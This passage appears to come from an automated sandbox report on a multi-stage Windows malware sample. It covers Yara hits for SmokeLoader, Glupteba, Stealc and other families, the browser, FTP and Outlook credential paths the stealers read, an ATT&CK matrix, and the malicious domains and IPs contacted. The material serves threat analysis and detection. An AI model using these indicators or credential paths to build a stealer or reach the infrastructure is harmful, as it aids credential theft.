                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,8_2_004092EC
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,8_2_00404EB4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0040DB5E
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,8_2_005CBB00
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_0040DF26
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,8_2_0040B72B
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_004093C6
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,8_2_00410FD4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: EnumSystemLocalesA,8_2_0040DFE8
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: GetLocaleInfoA,17_2_004051FC
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: GetLocaleInfoA,17_2_00405248
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: GetLocaleInfoA,18_2_00408570
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: GetLocaleInfoA,18_2_004085BC
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\Temp\572.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\356F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\356F.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBA50 FreeEnvironmentStringsW,ReadEventLogA,CreateNamedPipeA,FileTimeToLocalFileTime,8_2_005CBA50
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBF60 GetSystemTimes,GetSystemTimes,FlushFileBuffers,GetVolumeInformationW,FlushFileBuffers,GetVolumeInformationW,8_2_005CBF60
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00455588 GetUserNameA,18_2_00455588
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00405CE4 GetVersionExA,17_2_00405CE4
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Glupteba
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected Socks5Systemz
                Source: Yara matchFile source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected Stealc
                Source: Yara matchFile source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                Source: Yara matchFile source: 0000002B.00000002.2971930000.0000000000443000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Glupteba
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected Socks5Systemz
                Source: Yara matchFile source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected Stealc
                Source: Yara matchFile source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		1
                Spearphishing Link                		21
                Windows Management Instrumentation                		1
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                System Time Discovery                		1
                Exploitation of Remote Services                		11
                Archive Collected Data                		13
                Ingress Tool Transfer                		1
                Exfiltration Over Alternative Protocol                		1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts4
                Native API                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		11
                Deobfuscate/Decode Files or Information                		1
                Credential API Hooking                		1
                Account Discovery                		Remote Desktop Protocol2
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Brute Force                		3
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		1
                Bootkit                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		NTDS49
                System Information Discovery                		Distributed Component Object Model1
                Credential API Hooking                		4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script513
                Process Injection                		23
                Software Packing                		LSA Secrets1
                Query Registry                		SSHKeylogging145
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		Cached Domain Credentials461
                Security Software Discovery                		VNCGUI Input Capture1
                Proxy                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                File Deletion                		DCSync161
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Masquerading                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow11
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Access Token Manipulation                		Network Sniffing3
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd513
                Process Injection                		Input Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                Hidden Files and Directories                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                Regsvr32                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                Bootkit                		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1386724 Sample: S23UhdW5DH.exe Startdate: 05/02/2024 Architecture: WINDOWS Score: 100 135 followerstiktok.xyz 2->135 137 ww16.followerstiktok.xyz 2->137 139 324 other IPs or domains 2->139 165 Snort IDS alert for network traffic 2->165 167 Multi AV Scanner detection for domain / URL 2->167 169 Found malware configuration 2->169 173 25 other signatures 2->173 12 S23UhdW5DH.exe 2->12         started        15 rghwvve 2->15         started        17 svchost.exe 2->17         started        19 2 other processes 2->19 signatures3 171 Performs DNS queries to domains with low reputation 137->171 process4 signatures5 203 Detected unpacking (changes PE section rights) 12->203 205 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->205 207 Maps a DLL or memory area into another process 12->207 209 Creates a thread in another existing process (thread injection) 12->209 21 explorer.exe 59 24 12->21 injected 211 Multi AV Scanner detection for dropped file 15->211 213 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->213 215 Checks if the current machine is a virtual machine (disk enumeration) 15->215 26 WerFault.exe 17->26         started        process6 dnsIp7 153 185.172.128.19 NADYMSS-ASRU Russian Federation 21->153 155 real.avalmag.com 172.67.213.22 CLOUDFLARENETUS United States 21->155 89 C:\Users\user\AppData\Roaming\rghwvve, PE32 21->89 dropped 91 C:\Users\user\AppData\Local\Temp\FE8B.exe, PE32 21->91 dropped 93 C:\Users\user\AppData\Local\Temp\93B.exe, PE32 21->93 dropped 95 6 other malicious files 21->95 dropped 175 System process connects to network (likely due to code injection or exploit) 21->175 177 Benign windows process drops PE files 21->177 179 Deletes itself after installation 21->179 181 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->181 28 356F.exe 21->28         started        32 1EB9.exe 21->32         started        34 572.exe 21->34         started        36 4 other processes 21->36 file8 signatures9 process10 dnsIp11 127 C:\Users\user\AppData\...\InstallSetup4.exe, PE32 28->127 dropped 129 C:\Users\user\AppData\Local\...\FourthX.exe, PE32+ 28->129 dropped 131 C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32 28->131 dropped 217 Multi AV Scanner detection for dropped file 28->217 39 InstallSetup4.exe 28->39         started        44 288c47bbc1871b439df19ff4df68f076.exe 28->44         started        46 FourthX.exe 28->46         started        133 C:\Users\user\AppData\Local\Temp\...\1EB9.tmp, PE32 32->133 dropped 48 1EB9.tmp 32->48         started        219 Contains functionality to inject code into remote processes 34->219 221 Drops PE files with benign system names 34->221 223 Injects a PE file into a foreign processes 34->223 50 572.exe 3 15 34->50         started        141 secretionsuitcasenioise.shop 104.21.16.152 CLOUDFLARENETUS United States 36->141 143 gemcreedarticulateod.shop 172.67.152.52 CLOUDFLARENETUS United States 36->143 145 2 other IPs or domains 36->145 225 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 36->225 227 Machine Learning detection for dropped file 36->227 229 Contains functionality to infect the boot sector 36->229 231 LummaC encrypted strings found 36->231 52 regsvr32.exe 36->52         started        54 WerFault.exe 36->54         started        56 csrss.exe 36->56         started        file12 signatures13 process14 dnsIp15 157 5.42.64.33 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 39->157 107 C:\Users\user\AppData\Local\...\nsx5151.tmp, PE32 39->107 dropped 109 C:\Users\user\AppData\Local\...\INetC.dll, PE32 39->109 dropped 111 C:\Users\user\AppData\...\BroomSetup.exe, PE32 39->111 dropped 113 C:\Users\user\AppData\...\syncUpd[1].exe, PE32 39->113 dropped 183 Multi AV Scanner detection for dropped file 39->183 58 nsx5151.tmp 39->58         started        62 BroomSetup.exe 39->62         started        185 Detected unpacking (changes PE section rights) 44->185 187 Detected unpacking (overwrites its own PE header) 44->187 189 UAC bypass detected (Fodhelper) 44->189 191 Suspicious powershell command line found 46->191 64 powershell.exe 46->64         started        66 1EB9.exe 48->66         started        159 77.88.21.249 YANDEXRU Russian Federation 50->159 161 sistemas.pa.gov.br 177.74.1.157 PRODEPA-EmpTecdaInfeComdoEstadodoParaBR Brazil 50->161 163 273 other IPs or domains 50->163 115 C:\ProgramData\Drivers\csrss.exe, PE32 50->115 dropped 193 Found Tor onion address 50->193 file16 signatures17 process18 file19 117 C:\Users\user\AppData\...\softokn3[1].dll, PE32 58->117 dropped 119 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 58->119 dropped 121 C:\Users\user\AppData\...\mozglue[1].dll, PE32 58->121 dropped 125 9 other files (5 malicious) 58->125 dropped 195 Multi AV Scanner detection for dropped file 58->195 197 Detected unpacking (changes PE section rights) 58->197 199 Detected unpacking (overwrites its own PE header) 58->199 201 4 other signatures 58->201 68 cmd.exe 62->68         started        70 FourthX.exe 64->70         started        73 conhost.exe 64->73         started        123 C:\Users\user\AppData\Local\Temp\...\1EB9.tmp, PE32 66->123 dropped 75 1EB9.tmp 66->75         started        signatures20 process21 file22 77 conhost.exe 68->77         started        79 chcp.com 68->79         started        97 C:\ProgramData\...\vueqjgslwynd.exe, PE32+ 70->97 dropped 99 C:\Users\user\AppData\...\zlib1.dll (copy), PE32 75->99 dropped 101 C:\Users\user\...\vbsmartcardviewer.exe, PE32 75->101 dropped 103 C:\Users\user\AppData\...\unins000.exe (copy), PE32 75->103 dropped 105 32 other files (29 malicious) 75->105 dropped 81 vbsmartcardviewer.exe 75->81         started        84 vbsmartcardviewer.exe 75->84         started        process23 dnsIp24 87 C:\ProgramData\...\ObjectSerialization65.exe, PE32 81->87 dropped 147 store.steampowered.com 84->147 149 pop3.sii.itzacatepec.edu.mx 84->149 151 2 other IPs or domains 84->151 file25

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                S23UhdW5DH.exe45%ReversingLabsWin32.Trojan.CrypterX
                S23UhdW5DH.exe53%VirustotalBrowse
                S23UhdW5DH.exe100%AviraHEUR/AGEN.1312686
                S23UhdW5DH.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\Drivers\csrss.exe100%Joe Sandbox ML
                C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe100%Joe Sandbox ML
                C:\ProgramData\freebl3.dll0%ReversingLabs
                C:\ProgramData\mozglue.dll0%ReversingLabs
                C:\ProgramData\msvcp140.dll0%ReversingLabs
                C:\ProgramData\nss3.dll0%ReversingLabs
                C:\ProgramData\softokn3.dll0%ReversingLabs
                C:\ProgramData\vcruntime140.dll0%ReversingLabs
                C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe88%ReversingLabsWin64.Packed.Generic
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe34%ReversingLabs
                C:\Users\user\AppData\Local\Temp\1EB9.exe8%ReversingLabs
                C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe51%ReversingLabsWin32.Trojan.Zusy
                C:\Users\user\AppData\Local\Temp\356F.exe92%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\93B.exe87%ReversingLabsWin32.Trojan.Pitou
                C:\Users\user\AppData\Local\Temp\BroomSetup.exe21%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\FE8B.exe50%ReversingLabsWin32.Spyware.Lummastealer
                C:\Users\user\AppData\Local\Temp\FourthX.exe88%ReversingLabsWin64.Packed.Generic
                C:\Users\user\AppData\Local\Temp\InstallSetup4.exe61%ReversingLabsWin32.Trojan.Nemesis
                C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp3%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp3%ReversingLabs
                C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\nsx5151.tmp34%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)3%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmp3%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Roaming\rghwvve45%ReversingLabsWin32.Trojan.CrypterX

